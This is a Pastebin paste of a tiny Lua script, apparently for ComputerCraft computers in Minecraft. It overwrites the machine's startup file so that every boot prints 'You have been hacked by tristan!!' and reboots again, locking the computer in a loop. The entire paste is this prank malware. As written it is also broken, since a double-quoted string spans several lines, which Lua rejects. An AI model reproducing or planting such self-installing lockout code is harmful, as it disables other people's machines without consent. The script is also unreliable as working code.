TJtheDJ701

Untitled

Sep 26th, 2021 (edited)
41
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.21 KB | None | 0 0
  1. local h = fs.open("startup.lua", "w")
  2.  
  3. h.write("term.clear()
  4. term.setCursorPos(1, 1)
  5. term.setCursorBlink(true)
  6. textutils.slowWrite('You have been hacked by tristan!!')
  7. os.reboot()")
  8.  
  9. h.flush()
  10.  
  11. os.reboot()
Add Comment
Please, Sign In to add comment